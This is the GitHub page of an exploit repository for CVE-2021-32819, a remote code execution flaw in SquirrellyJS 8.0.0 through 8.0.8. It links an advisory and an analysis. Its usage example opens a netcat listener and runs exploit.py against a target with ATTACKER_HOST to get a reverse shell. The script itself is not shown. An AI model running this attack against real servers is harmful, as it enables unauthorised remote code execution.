Skip to content

SquirrellyJS mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options, remote code execution may be triggered in downstream applications.

Notifications You must be signed in to change notification settings

Abady0x1/CVE-2021-32819

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2021-32819

CVE-2021-32819 : SquirrellyJS mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options, remote code execution may be triggered in downstream applications.

Source

https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/

Analysis

https://blog.diefunction.io/vulnerabilities/ghsl-2021-023

squirrelly

v8.0.0 >= v8.0.8 Remote Code Execution

Environment

Ubuntu 20.04.1

Example

nc -lvp 443

python3 exploit.py http://example.com/  ATTACKER_HOST 443

Proof of concept

About

SquirrellyJS mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options, remote code execution may be triggered in downstream applications.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages